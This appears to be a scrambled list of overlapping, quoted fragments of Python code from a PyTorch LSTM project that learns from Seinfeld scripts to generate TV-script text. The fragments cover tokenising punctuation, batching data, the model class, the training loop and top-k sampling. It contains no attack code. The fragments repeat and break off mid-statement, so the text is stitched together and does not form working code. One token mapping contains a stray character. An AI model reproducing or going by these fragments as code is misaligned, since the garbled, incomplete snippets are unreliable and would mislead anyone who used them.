=", "top_i = top_i.numpy().squeeze() # select the likely next word index with some element", "# Learning Rate learning_rate = 0.001 # Model parameters # Vocab size vocab_size", "rnn # Data params # Sequence Length sequence_length = 8 # of words", "of dims (n_layers, batch_size, hidden_dim) ''' # Implement function weight = next(self.parameters()).data if", "the index of the next word top_k = 5 p, top_i = p.topk(top_k)", "= len(words)//batch_size words = words[:n_batches*batch_size] features = [] targets = [] total =", "Dimension embedding_dim = 128 # Hidden Dimension hidden_dim = 512 # Number of", "dataloader return train_loader int_text, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess() print(token_dict) print(int_text[:10]) print(list(vocab_to_int.values())[:10]) print(list(int_to_vocab.values())[:10])", "# retrieve that word from the dictionary word = int_to_vocab[word_i] predicted.append(word) # the", "np.roll(current_seq, -1, 1) current_seq[-1][-1] = word_i gen_sentences = ' '.join(predicted) # Replace punctuation", "= F.softmax(output, dim=1).data if(train_on_gpu): p = p.cpu() # move to cpu # use", "= rnn.init_hidden(batch_size) for batch_i, (inputs, labels) in enumerate(train_loader, 1): # make sure you", "rnn.init_hidden(current_seq.size(0)) # get the output of the rnn output, _ = rnn(current_seq, hidden)", "batch_losses = [] # returns a trained rnn return rnn # Data params", "self).__init__() # set class variables self.output_size = output_size self.n_layers = n_layers self.hidden_dim =", "index of the next word top_k = 5 p, top_i = p.topk(top_k) top_i", "hidden) # get the next word probabilities p = F.softmax(output, dim=1).data if(train_on_gpu): p", "value used to pad a sequence :param predict_len: The length of text to", "# Show stats for every n number of batches show_every_n_batches = 500 #", "randomness p = p.numpy().squeeze() word_i = np.random.choice(top_i, p=p/p.sum()) # retrieve that word from", "get the output of the rnn output, _ = rnn(current_seq, hidden) # get", "'?': '||QUESTION_MARK||', '(': '||LEFT_PAREN>||', ')': '||RIGHT_PAREN||', '-': '||DASH||', '\\n': '||RETURN||', } helper.preprocess_and_save_data(data_dir, token_lookup,", "features.append(x) y = words[idx+sequence_length] targets.append(y) train_x = np.array(features) train_y = np.array(targets) train_data =", "hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_()) return hidden def forward_back_prop(rnn, optimizer,", ":param predict_len: The length of text to generate :return: The generated text \"\"\"", "The length of text to generate :return: The generated text \"\"\" rnn.eval() #", "state return x, h def init_hidden(self, batch_size): ''' Initialize the hidden state of", "the neural network :param decoder: The PyTorch Module that holds the neural network", "criterion: The PyTorch loss function :param inp: A batch of input to the", "= np.roll(current_seq, -1, 1) current_seq[-1][-1] = word_i gen_sentences = ' '.join(predicted) # Replace", "h = rnn(inp, h) loss = criterion(output, target) loss.backward() nn.utils.clip_grad_norm_(rnn.parameters(), 5) optimizer.step() #", "batch_size, optimizer, criterion, n_epochs, show_every_n_batches=100): batch_losses = [] rnn.train() print(\"Training for %d epoch(s)...\"", "dimensions of the neural network (the size of the vocabulary) :param output_size: The", "to get the index of the next word top_k = 5 p, top_i", "batches, only n_batches = len(train_loader.dataset)//batch_size if(batch_i > n_batches): break # forward, back prop", "using the neural network :param decoder: The PyTorch Module that holds the trained", "if train_on_gpu: current_seq = torch.LongTensor(current_seq).cuda() else: current_seq = torch.LongTensor(current_seq) # initialize the hidden", "modify the length to your preference prime_word = 'jerry' # name for starting", "hidden def forward_back_prop(rnn, optimizer, criterion, inp, target, hidden): \"\"\" Forward and backward propagation", "range(predict_len): if train_on_gpu: current_seq = torch.LongTensor(current_seq).cuda() else: current_seq = torch.LongTensor(current_seq) # initialize the", "inputs, labels, hidden) # record loss batch_losses.append(loss) # printing loss stats if batch_i", "', '(') # return all the sentences return gen_sentences # run the cell", "= len(train_loader.dataset)//batch_size if(batch_i > n_batches): break # forward, back prop loss, hidden =", "torch.nn.functional as F def generate(rnn, prime_id, int_to_vocab, token_dict, pad_value, predict_len=100): \"\"\" Generate text", "helper.save_model('./trained_tv_script', trained_rnn) print('Model Trained and Saved') _, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess() trained_rnn", "for _ in range(predict_len): if train_on_gpu: current_seq = torch.LongTensor(current_seq).cuda() else: current_seq = torch.LongTensor(current_seq)", "for batch_i, (inputs, labels) in enumerate(train_loader, 1): # make sure you iterate over", "change train_loader = batch_data(int_text, sequence_length, batch_size) # Training parameters # Number of Epochs", "dropout=0.5): \"\"\" Initialize the PyTorch RNN Module :param vocab_size: The number of input", "hidden]) rnn.zero_grad() output, h = rnn(inp, h) loss = criterion(output, target) loss.backward() nn.utils.clip_grad_norm_(rnn.parameters(),", "defining loss and optimization functions for training optimizer = torch.optim.Adam(rnn.parameters(), lr=learning_rate) criterion =", "= (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda()) else: hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_(),", "the batch of input :return: The loss and the latest hidden state Tensor", "your neural network.') def create_lookup_tables(text): \"\"\" Create lookup tables for vocabulary :param text:", "% n_epochs) for epoch_i in range(1, n_epochs + 1): # initialize hidden state", "Initialize the PyTorch RNN Module :param vocab_size: The number of input dimensions of", "hidden) # record loss batch_losses.append(loss) # printing loss stats if batch_i % show_every_n_batches", "Learning Rate learning_rate = 0.001 # Model parameters # Vocab size vocab_size =", "int_to_vocab, token_dict = helper.load_preprocess() print(token_dict) print(int_text[:10]) print(list(vocab_to_int.values())[:10]) print(list(int_to_vocab.values())[:10]) class RNN(nn.Module): def __init__(self, vocab_size,", "of batches show_every_n_batches = 500 # create model and move to gpu if", "loader - do not change train_loader = batch_data(int_text, sequence_length, batch_size) # Training parameters", "word in int_to_vocab.items()} return vocab_to_int, int_to_vocab def token_lookup(): \"\"\" Generate a dict to", "output of the neural network and the latest hidden state \"\"\" batch_size =", ":return: The loss and the latest hidden state Tensor \"\"\" # move data", "each batch; the number of sequences in a batch :return: DataLoader with batched", "# Training parameters # Number of Epochs num_epochs = 5 # Learning Rate", "printing loss stats if batch_i % show_every_n_batches == 0: print('Epoch: {:>4}/{:<4} Loss: {}\\n'.format(", "loss and the latest hidden state Tensor \"\"\" # move data to GPU,", "# Embedding Dimension embedding_dim = 128 # Hidden Dimension hidden_dim = 512 #", "def generate(rnn, prime_id, int_to_vocab, token_dict, pad_value, predict_len=100): \"\"\" Generate text using the neural", ":param prime_id: The word id to start the first prediction :param int_to_vocab: Dict", "= 512 # Number of RNN Layers n_layers = 2 # Show stats", "load in data import helper import numpy as np import torch import torch.nn", "The size of the hidden layer outputs :param dropout: dropout to add in", ":return: Two Tensors, the output of the neural network and the latest hidden", "# run the cell multiple times to get different results! gen_length = 400", "of input dimensions of the neural network (the size of the vocabulary) :param", "the neural network data using DataLoader :param words: The word ids of the", "stats if batch_i % show_every_n_batches == 0: print('Epoch: {:>4}/{:<4} Loss: {}\\n'.format( epoch_i, n_epochs,", "# Hidden Dimension hidden_dim = 512 # Number of RNN Layers n_layers =", "saving the trained model helper.save_model('./trained_tv_script', trained_rnn) print('Model Trained and Saved') _, vocab_to_int, int_to_vocab,", "into a token. :return: Tokenized dictionary where the key is the punctuation and", "Tensor \"\"\" # move data to GPU, if available if train_on_gpu: inp, target", "hidden = forward_back_prop(rnn, optimizer, criterion, inputs, labels, hidden) # record loss batch_losses.append(loss) #", "hidden): \"\"\" Forward and backward propagation on the neural network :param decoder: The", "create a sequence (batch_size=1) with the prime_id current_seq = np.full((1, sequence_length), pad_value) current_seq[-1][-1]", "= self.lstm(x, hidden) x = x.contiguous().view(-1, self.hidden_dim) # x = self.dropout(x) x =", "= TensorDataset(torch.from_numpy(train_x), torch.from_numpy(train_y)) train_loader = DataLoader(train_data, shuffle=False, batch_size=batch_size) # return a dataloader return", "# create a sequence (batch_size=1) with the prime_id current_seq = np.full((1, sequence_length), pad_value)", "LSTM/GRU :param batch_size: The batch_size of the hidden state :return: hidden state of", "produced by our model return loss.item(), h def train_rnn(rnn, batch_size, optimizer, criterion, n_epochs,", "ANYTHING IN THIS CELL THAT IS BELOW THIS LINE \"\"\" pad_word = helper.SPECIAL_WORDS['PADDING']", "The word id to start the first prediction :param int_to_vocab: Dict of word", "(vocab_to_int, int_to_vocab) \"\"\" word_counts = Counter(text) sorted_vocab = sorted(word_counts, key=word_counts.get, reverse=True) int_to_vocab =", ":param vocab_size: The number of input dimensions of the neural network (the size", "'||DASH||', '\\n': '||RETURN||', } helper.preprocess_and_save_data(data_dir, token_lookup, create_lookup_tables) def batch_data(words, sequence_length, batch_size): \"\"\" Batch", "128 # Hidden Dimension hidden_dim = 512 # Number of RNN Layers n_layers", "in token_dict.items(): ending = ' ' if key in ['\\n', '(', '\"'] else", "variables self.output_size = output_size self.n_layers = n_layers self.hidden_dim = hidden_dim # define model", "batch_losses.append(loss) # printing loss stats if batch_i % show_every_n_batches == 0: print('Epoch: {:>4}/{:<4}", "function weight = next(self.parameters()).data if (train_on_gpu): hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda(), weight.new(self.n_layers, batch_size,", "total = len(words)-sequence_length for idx in range(0, total): x = words[idx:idx+sequence_length] features.append(x) y", "+ 1): # initialize hidden state hidden = rnn.init_hidden(batch_size) for batch_i, (inputs, labels)", "Dict of word id keys to word values :param token_dict: Dict of puncuation", "current_seq[-1][-1] = prime_id predicted = [int_to_vocab[prime_id]] for _ in range(predict_len): if train_on_gpu: current_seq", "hidden state of an LSTM/GRU :param batch_size: The batch_size of the hidden state", "key in ['\\n', '(', '\"'] else '' gen_sentences = gen_sentences.replace(' ' + token.lower(),", "if(batch_i > n_batches): break # forward, back prop loss, hidden = forward_back_prop(rnn, optimizer,", "sequence length of each batch :param batch_size: The size of each batch; the", "dropout to add in between LSTM/GRU layers \"\"\" super(RNN, self).__init__() # set class", "= 0.001 # Model parameters # Vocab size vocab_size = len(vocab_to_int) # Output", "batch_size, self.hidden_dim).zero_().cuda()) else: hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_()) return hidden", "TV scripts :param sequence_length: The sequence length of each batch :param batch_size: The", "token_lookup(): \"\"\" Generate a dict to turn punctuation into a token. :return: Tokenized", ":param target: The target output for the batch of input :return: The loss", "to generate :return: The generated text \"\"\" rnn.eval() # create a sequence (batch_size=1)", "into words :return: A tuple of dicts (vocab_to_int, int_to_vocab) \"\"\" word_counts = Counter(text)", "batch; the number of sequences in a batch :return: DataLoader with batched data", "__init__(self, vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5): \"\"\" Initialize the PyTorch RNN Module", "dropout=0.5) if train_on_gpu: rnn.cuda() # defining loss and optimization functions for training optimizer", "torch.utils.data import TensorDataset, DataLoader data_dir = './data/Seinfeld_Scripts.txt' text = helper.load_data(data_dir) # Check for", "Number of Epochs num_epochs = 5 # Learning Rate learning_rate = 0.001 #", "int_text, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess() print(token_dict) print(int_text[:10]) print(list(vocab_to_int.values())[:10]) print(list(int_to_vocab.values())[:10]) class RNN(nn.Module): def", "TensorDataset(torch.from_numpy(train_x), torch.from_numpy(train_y)) train_loader = DataLoader(train_data, shuffle=False, batch_size=batch_size) # return a dataloader return train_loader", "sequence_length: The sequence length of each batch :param batch_size: The size of each", "the generated word becomes the next \"current sequence\" and the cycle can continue", "layers self.embedding = nn.Embedding(vocab_size, embedding_dim) self.lstm = nn.LSTM(embedding_dim, hidden_dim, n_layers, dropout=dropout, batch_first=True) self.fc", "# saving the trained model helper.save_model('./trained_tv_script', trained_rnn) print('Model Trained and Saved') _, vocab_to_int,", "= nn.Embedding(vocab_size, embedding_dim) self.lstm = nn.LSTM(embedding_dim, hidden_dim, n_layers, dropout=dropout, batch_first=True) self.fc = nn.Linear(hidden_dim,", "current_seq = np.roll(current_seq, -1, 1) current_seq[-1][-1] = word_i gen_sentences = ' '.join(predicted) #", "function :param inp: A batch of input to the neural network :param target:", "dims (n_layers, batch_size, hidden_dim) ''' # Implement function weight = next(self.parameters()).data if (train_on_gpu):", "= words[:n_batches*batch_size] features = [] targets = [] total = len(words)-sequence_length for idx", "range(1, n_epochs + 1): # initialize hidden state hidden = rnn.init_hidden(batch_size) for batch_i,", "Module :param vocab_size: The number of input dimensions of the neural network (the", "model helper.save_model('./trained_tv_script', trained_rnn) print('Model Trained and Saved') _, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()", "train_on_gpu: print('No GPU found. Please use a GPU to train your neural network.')", "# Number of RNN Layers n_layers = 2 # Show stats for every", "define model layers self.embedding = nn.Embedding(vocab_size, embedding_dim) self.lstm = nn.LSTM(embedding_dim, hidden_dim, n_layers, dropout=dropout,", "the hidden state produced by our model return loss.item(), h def train_rnn(rnn, batch_size,", "torch.cuda.is_available() if not train_on_gpu: print('No GPU found. Please use a GPU to train", "size of the hidden layer outputs :param dropout: dropout to add in between", "\"\"\" Forward propagation of the neural network :param nn_input: The input to the", "first prediction :param int_to_vocab: Dict of word id keys to word values :param", "'\"'] else '' gen_sentences = gen_sentences.replace(' ' + token.lower(), key) gen_sentences = gen_sentences.replace('\\n", "network :param embedding_dim: The size of embeddings, should you choose to use them", "to cpu # use top_k sampling to get the index of the next", "'' gen_sentences = gen_sentences.replace(' ' + token.lower(), key) gen_sentences = gen_sentences.replace('\\n ', '\\n')", "the cell multiple times to get different results! gen_length = 400 # modify", "{ii: word for ii, word in enumerate(sorted_vocab)} vocab_to_int = {word: ii for ii,", "PyTorch Module that holds the neural network :param decoder_optimizer: The PyTorch optimizer for", "The generated text \"\"\" rnn.eval() # create a sequence (batch_size=1) with the prime_id", "a batch and the hidden state produced by our model return loss.item(), h", "torch.optim.Adam(rnn.parameters(), lr=learning_rate) criterion = nn.CrossEntropyLoss() # training the model trained_rnn = train_rnn(rnn, batch_size,", "if available rnn = RNN(vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5) if train_on_gpu: rnn.cuda()", "Module that holds the trained neural network :param prime_id: The word id to", "train_on_gpu = torch.cuda.is_available() if not train_on_gpu: print('No GPU found. Please use a GPU", "CELL THAT IS BELOW THIS LINE \"\"\" pad_word = helper.SPECIAL_WORDS['PADDING'] generated_script = generate(trained_rnn,", "sequence_length, batch_size): \"\"\" Batch the neural network data using DataLoader :param words: The", "gen_sentences = gen_sentences.replace('\\n ', '\\n') gen_sentences = gen_sentences.replace('( ', '(') # return all", "''' # Implement function weight = next(self.parameters()).data if (train_on_gpu): hidden = (weight.new(self.n_layers, batch_size,", "returns a trained rnn return rnn # Data params # Sequence Length sequence_length", "Output size output_size = vocab_size # Embedding Dimension embedding_dim = 128 # Hidden", "= './data/Seinfeld_Scripts.txt' text = helper.load_data(data_dir) # Check for a GPU train_on_gpu = torch.cuda.is_available()", "as np import torch import torch.nn as nn from string import punctuation from", "Dimension hidden_dim = 512 # Number of RNN Layers n_layers = 2 #", "import torch.nn as nn from string import punctuation from collections import Counter from", "n number of batches show_every_n_batches = 500 # create model and move to", "DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE \"\"\" pad_word", "LINE \"\"\" pad_word = helper.SPECIAL_WORDS['PADDING'] generated_script = generate(trained_rnn, vocab_to_int[prime_word + ':'], int_to_vocab, token_dict,", "trained rnn return rnn # Data params # Sequence Length sequence_length = 8", "= helper.load_preprocess() trained_rnn = helper.load_model('./trained_tv_script') import torch.nn.functional as F def generate(rnn, prime_id, int_to_vocab,", "state of an LSTM/GRU :param batch_size: The batch_size of the hidden state :return:", "h) loss = criterion(output, target) loss.backward() nn.utils.clip_grad_norm_(rnn.parameters(), 5) optimizer.step() # return the loss", "batch_size of the hidden state :return: hidden state of dims (n_layers, batch_size, hidden_dim)", "pad_value, predict_len=100): \"\"\" Generate text using the neural network :param decoder: The PyTorch", "becomes the next \"current sequence\" and the cycle can continue current_seq = np.roll(current_seq,", "word id keys to word values :param token_dict: Dict of puncuation tokens keys", "= np.random.choice(top_i, p=p/p.sum()) # retrieve that word from the dictionary word = int_to_vocab[word_i]", "from torch.utils.data import TensorDataset, DataLoader data_dir = './data/Seinfeld_Scripts.txt' text = helper.load_data(data_dir) # Check", "the TV scripts :param sequence_length: The sequence length of each batch :param batch_size:", "is the punctuation and the value is the token \"\"\" return { '.':", "output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5): \"\"\" Initialize the PyTorch RNN Module :param vocab_size:", "gpu if available rnn = RNN(vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5) if train_on_gpu:", "ii, word in int_to_vocab.items()} return vocab_to_int, int_to_vocab def token_lookup(): \"\"\" Generate a dict", "5 # Learning Rate learning_rate = 0.001 # Model parameters # Vocab size", "hidden_dim: The size of the hidden layer outputs :param dropout: dropout to add", "on the neural network :param decoder: The PyTorch Module that holds the neural", "= top_i.numpy().squeeze() # select the likely next word index with some element of", "\"\"\" Initialize the PyTorch RNN Module :param vocab_size: The number of input dimensions", "state hidden = rnn.init_hidden(batch_size) for batch_i, (inputs, labels) in enumerate(train_loader, 1): # make", "loss.item(), h def train_rnn(rnn, batch_size, optimizer, criterion, n_epochs, show_every_n_batches=100): batch_losses = [] rnn.train()", "word top_k = 5 p, top_i = p.topk(top_k) top_i = top_i.numpy().squeeze() # select", "= len(words)-sequence_length for idx in range(0, total): x = words[idx:idx+sequence_length] features.append(x) y =", "token_dict = helper.load_preprocess() trained_rnn = helper.load_model('./trained_tv_script') import torch.nn.functional as F def generate(rnn, prime_id,", "the output of the rnn output, _ = rnn(current_seq, hidden) # get the", "text of tv scripts split into words :return: A tuple of dicts (vocab_to_int,", "initialize hidden state hidden = rnn.init_hidden(batch_size) for batch_i, (inputs, labels) in enumerate(train_loader, 1):", "words[idx:idx+sequence_length] features.append(x) y = words[idx+sequence_length] targets.append(y) train_x = np.array(features) train_y = np.array(targets) train_data", "400 # modify the length to your preference prime_word = 'jerry' # name", "of randomness p = p.numpy().squeeze() word_i = np.random.choice(top_i, p=p/p.sum()) # retrieve that word", "train_x = np.array(features) train_y = np.array(targets) train_data = TensorDataset(torch.from_numpy(train_x), torch.from_numpy(train_y)) train_loader = DataLoader(train_data,", "create_lookup_tables) def batch_data(words, sequence_length, batch_size): \"\"\" Batch the neural network data using DataLoader", "= p.topk(top_k) top_i = top_i.numpy().squeeze() # select the likely next word index with", "data using DataLoader :param words: The word ids of the TV scripts :param", "= self.fc(x) x = x.view(batch_size, -1, self.output_size) x = x[:, -1] # return", "and the hidden state produced by our model return loss.item(), h def train_rnn(rnn,", "total): x = words[idx:idx+sequence_length] features.append(x) y = words[idx+sequence_length] targets.append(y) train_x = np.array(features) train_y", "hidden state Tensor \"\"\" # move data to GPU, if available if train_on_gpu:", "nn.Embedding(vocab_size, embedding_dim) self.lstm = nn.LSTM(embedding_dim, hidden_dim, n_layers, dropout=dropout, batch_first=True) self.fc = nn.Linear(hidden_dim, output_size)", "return { '.': '||PERIOD||', ',': '||COMMA||', '\"': '||QUOTATION_MARK||', ';': '||SEMICOLON||', '!': '||EXCLAMATION_MARK||', '?':", "decoder: The PyTorch Module that holds the neural network :param decoder_optimizer: The PyTorch", "enumerate(train_loader, 1): # make sure you iterate over completely full batches, only n_batches", "helper.load_preprocess() print(token_dict) print(int_text[:10]) print(list(vocab_to_int.values())[:10]) print(list(int_to_vocab.values())[:10]) class RNN(nn.Module): def __init__(self, vocab_size, output_size, embedding_dim, hidden_dim,", "batch_size, self.hidden_dim).zero_().cuda(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda()) else: hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_(), weight.new(self.n_layers, batch_size,", "the punctuation and the value is the token \"\"\" return { '.': '||PERIOD||',", "hidden): \"\"\" Forward propagation of the neural network :param nn_input: The input to", "# return all the sentences return gen_sentences # run the cell multiple times", "'\\n') gen_sentences = gen_sentences.replace('( ', '(') # return all the sentences return gen_sentences", "puncuation tokens keys to puncuation values :param pad_value: The value used to pad", "sequence_length), pad_value) current_seq[-1][-1] = prime_id predicted = [int_to_vocab[prime_id]] for _ in range(predict_len): if", "n_batches = len(train_loader.dataset)//batch_size if(batch_i > n_batches): break # forward, back prop loss, hidden", "train_y = np.array(targets) train_data = TensorDataset(torch.from_numpy(train_x), torch.from_numpy(train_y)) train_loader = DataLoader(train_data, shuffle=False, batch_size=batch_size) #", "= nn.LSTM(embedding_dim, hidden_dim, n_layers, dropout=dropout, batch_first=True) self.fc = nn.Linear(hidden_dim, output_size) self.dropout = nn.Dropout(dropout)", ":return: Tokenized dictionary where the key is the punctuation and the value is", "(weight.new(self.n_layers, batch_size, self.hidden_dim).zero_(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_()) return hidden def forward_back_prop(rnn, optimizer, criterion, inp,", "between LSTM/GRU layers \"\"\" super(RNN, self).__init__() # set class variables self.output_size = output_size", "over a batch and the hidden state produced by our model return loss.item(),", "Tokenized dictionary where the key is the punctuation and the value is the", "print('Model Trained and Saved') _, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess() trained_rnn = helper.load_model('./trained_tv_script')", "\"\"\" batch_size = nn_input.size(0) x = self.embedding(nn_input) x,h = self.lstm(x, hidden) x =", "'||PERIOD||', ',': '||COMMA||', '\"': '||QUOTATION_MARK||', ';': '||SEMICOLON||', '!': '||EXCLAMATION_MARK||', '?': '||QUESTION_MARK||', '(': '||LEFT_PAREN>||',", "batch_size, self.hidden_dim).zero_(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_()) return hidden def forward_back_prop(rnn, optimizer, criterion, inp, target,", "= [int_to_vocab[prime_id]] for _ in range(predict_len): if train_on_gpu: current_seq = torch.LongTensor(current_seq).cuda() else: current_seq", ":param embedding_dim: The size of embeddings, should you choose to use them :param", "-1, 1) current_seq[-1][-1] = word_i gen_sentences = ' '.join(predicted) # Replace punctuation tokens", "The PyTorch Module that holds the trained neural network :param prime_id: The word", "pad a sequence :param predict_len: The length of text to generate :return: The", "model return loss.item(), h def train_rnn(rnn, batch_size, optimizer, criterion, n_epochs, show_every_n_batches=100): batch_losses =", "a trained rnn return rnn # Data params # Sequence Length sequence_length =", "for ii, word in int_to_vocab.items()} return vocab_to_int, int_to_vocab def token_lookup(): \"\"\" Generate a", "= x[:, -1] # return one batch of output word scores and the", "batch_size, optimizer, criterion, num_epochs, show_every_n_batches) # saving the trained model helper.save_model('./trained_tv_script', trained_rnn) print('Model", "sequence\" and the cycle can continue current_seq = np.roll(current_seq, -1, 1) current_seq[-1][-1] =", "ids of the TV scripts :param sequence_length: The sequence length of each batch", "= Counter(text) sorted_vocab = sorted(word_counts, key=word_counts.get, reverse=True) int_to_vocab = {ii: word for ii,", "words[idx+sequence_length] targets.append(y) train_x = np.array(features) train_y = np.array(targets) train_data = TensorDataset(torch.from_numpy(train_x), torch.from_numpy(train_y)) train_loader", "The batch_size of the hidden state :return: hidden state of dims (n_layers, batch_size,", "rnn.init_hidden(batch_size) for batch_i, (inputs, labels) in enumerate(train_loader, 1): # make sure you iterate", "the trained model helper.save_model('./trained_tv_script', trained_rnn) print('Model Trained and Saved') _, vocab_to_int, int_to_vocab, token_dict", "batch_size: The batch_size of the hidden state :return: hidden state of dims (n_layers,", "return gen_sentences # run the cell multiple times to get different results! gen_length", "output word scores and the hidden state return x, h def init_hidden(self, batch_size):", "= helper.load_model('./trained_tv_script') import torch.nn.functional as F def generate(rnn, prime_id, int_to_vocab, token_dict, pad_value, predict_len=100):", "' if key in ['\\n', '(', '\"'] else '' gen_sentences = gen_sentences.replace(' '", "words = words[:n_batches*batch_size] features = [] targets = [] total = len(words)-sequence_length for", "loss function :param inp: A batch of input to the neural network :param", "n_batches = len(words)//batch_size words = words[:n_batches*batch_size] features = [] targets = [] total", "helper.load_model('./trained_tv_script') import torch.nn.functional as F def generate(rnn, prime_id, int_to_vocab, token_dict, pad_value, predict_len=100): \"\"\"", "predicted.append(word) # the generated word becomes the next \"current sequence\" and the cycle", "next \"current sequence\" and the cycle can continue current_seq = np.roll(current_seq, -1, 1)", "batch_data(words, sequence_length, batch_size): \"\"\" Batch the neural network data using DataLoader :param words:", "p = p.numpy().squeeze() word_i = np.random.choice(top_i, p=p/p.sum()) # retrieve that word from the", "get the next word probabilities p = F.softmax(output, dim=1).data if(train_on_gpu): p = p.cpu()", "to the neural network :param hidden: The hidden state :return: Two Tensors, the", "loss stats if batch_i % show_every_n_batches == 0: print('Epoch: {:>4}/{:<4} Loss: {}\\n'.format( epoch_i,", "a sequence # Batch Size batch_size = 100 # data loader - do", "one batch of output word scores and the hidden state return x, h", "rnn output, _ = rnn(current_seq, hidden) # get the next word probabilities p", "hidden layer outputs :param dropout: dropout to add in between LSTM/GRU layers \"\"\"", "import numpy as np import torch import torch.nn as nn from string import", "Create lookup tables for vocabulary :param text: The text of tv scripts split", "batch_size = nn_input.size(0) x = self.embedding(nn_input) x,h = self.lstm(x, hidden) x = x.contiguous().view(-1,", "the value is the token \"\"\" return { '.': '||PERIOD||', ',': '||COMMA||', '\"':", "punctuation tokens for key, token in token_dict.items(): ending = ' ' if key", "# make sure you iterate over completely full batches, only n_batches = len(train_loader.dataset)//batch_size", "rnn(inp, h) loss = criterion(output, target) loss.backward() nn.utils.clip_grad_norm_(rnn.parameters(), 5) optimizer.step() # return the", "THIS LINE \"\"\" pad_word = helper.SPECIAL_WORDS['PADDING'] generated_script = generate(trained_rnn, vocab_to_int[prime_word + ':'], int_to_vocab,", "and move to gpu if available rnn = RNN(vocab_size, output_size, embedding_dim, hidden_dim, n_layers,", "def __init__(self, vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5): \"\"\" Initialize the PyTorch RNN", "print(list(int_to_vocab.values())[:10]) class RNN(nn.Module): def __init__(self, vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5): \"\"\" Initialize", "dimensions of the neural network :param embedding_dim: The size of embeddings, should you", "of the vocabulary) :param output_size: The number of output dimensions of the neural", "the neural network :param criterion: The PyTorch loss function :param inp: A batch", "Counter(text) sorted_vocab = sorted(word_counts, key=word_counts.get, reverse=True) int_to_vocab = {ii: word for ii, word", "gen_sentences.replace('( ', '(') # return all the sentences return gen_sentences # run the", "'\\n': '||RETURN||', } helper.preprocess_and_save_data(data_dir, token_lookup, create_lookup_tables) def batch_data(words, sequence_length, batch_size): \"\"\" Batch the", "self.fc = nn.Linear(hidden_dim, output_size) self.dropout = nn.Dropout(dropout) def forward(self, nn_input, hidden): \"\"\" Forward", "of the TV scripts :param sequence_length: The sequence length of each batch :param", "gen_length = 400 # modify the length to your preference prime_word = 'jerry'", "word = int_to_vocab[word_i] predicted.append(word) # the generated word becomes the next \"current sequence\"", "Two Tensors, the output of the neural network and the latest hidden state", "learning_rate = 0.001 # Model parameters # Vocab size vocab_size = len(vocab_to_int) #", "\"\"\" Create lookup tables for vocabulary :param text: The text of tv scripts", "propagation on the neural network :param decoder: The PyTorch Module that holds the", "The PyTorch Module that holds the neural network :param decoder_optimizer: The PyTorch optimizer", "return hidden def forward_back_prop(rnn, optimizer, criterion, inp, target, hidden): \"\"\" Forward and backward", "helper.load_data(data_dir) # Check for a GPU train_on_gpu = torch.cuda.is_available() if not train_on_gpu: print('No", "2 # Show stats for every n number of batches show_every_n_batches = 500", "initialize the hidden state hidden = rnn.init_hidden(current_seq.size(0)) # get the output of the", "words[:n_batches*batch_size] features = [] targets = [] total = len(words)-sequence_length for idx in", "element of randomness p = p.numpy().squeeze() word_i = np.random.choice(top_i, p=p/p.sum()) # retrieve that", "hidden state \"\"\" batch_size = nn_input.size(0) x = self.embedding(nn_input) x,h = self.lstm(x, hidden)", "batch_data(int_text, sequence_length, batch_size) # Training parameters # Number of Epochs num_epochs = 5", "RNN Layers n_layers = 2 # Show stats for every n number of", "Show stats for every n number of batches show_every_n_batches = 500 # create", "select the likely next word index with some element of randomness p =", "= self.embedding(nn_input) x,h = self.lstm(x, hidden) x = x.contiguous().view(-1, self.hidden_dim) # x =", "backpropagation and optimization h = tuple([each.data for each in hidden]) rnn.zero_grad() output, h", "= rnn(current_seq, hidden) # get the next word probabilities p = F.softmax(output, dim=1).data", "for the batch of input :return: The loss and the latest hidden state", "move to cpu # use top_k sampling to get the index of the", "DataLoader data_dir = './data/Seinfeld_Scripts.txt' text = helper.load_data(data_dir) # Check for a GPU train_on_gpu", "input dimensions of the neural network (the size of the vocabulary) :param output_size:", "if not train_on_gpu: print('No GPU found. Please use a GPU to train your", "a sequence (batch_size=1) with the prime_id current_seq = np.full((1, sequence_length), pad_value) current_seq[-1][-1] =", "move data to GPU, if available if train_on_gpu: inp, target = inp.cuda(), target.cuda()", "punctuation and the value is the token \"\"\" return { '.': '||PERIOD||', ',':", "# Check for a GPU train_on_gpu = torch.cuda.is_available() if not train_on_gpu: print('No GPU", "sorted_vocab = sorted(word_counts, key=word_counts.get, reverse=True) int_to_vocab = {ii: word for ii, word in", "prime_word = 'jerry' # name for starting the script \"\"\" DON'T MODIFY ANYTHING", "network data using DataLoader :param words: The word ids of the TV scripts", "top_k sampling to get the index of the next word top_k = 5", "class RNN(nn.Module): def __init__(self, vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5): \"\"\" Initialize the", "dictionary where the key is the punctuation and the value is the token", ":param text: The text of tv scripts split into words :return: A tuple", "targets = [] total = len(words)-sequence_length for idx in range(0, total): x =", "number of batches show_every_n_batches = 500 # create model and move to gpu", "# load in data import helper import numpy as np import torch import", "state Tensor \"\"\" # move data to GPU, if available if train_on_gpu: inp,", "in enumerate(train_loader, 1): # make sure you iterate over completely full batches, only", "'\"': '||QUOTATION_MARK||', ';': '||SEMICOLON||', '!': '||EXCLAMATION_MARK||', '?': '||QUESTION_MARK||', '(': '||LEFT_PAREN>||', 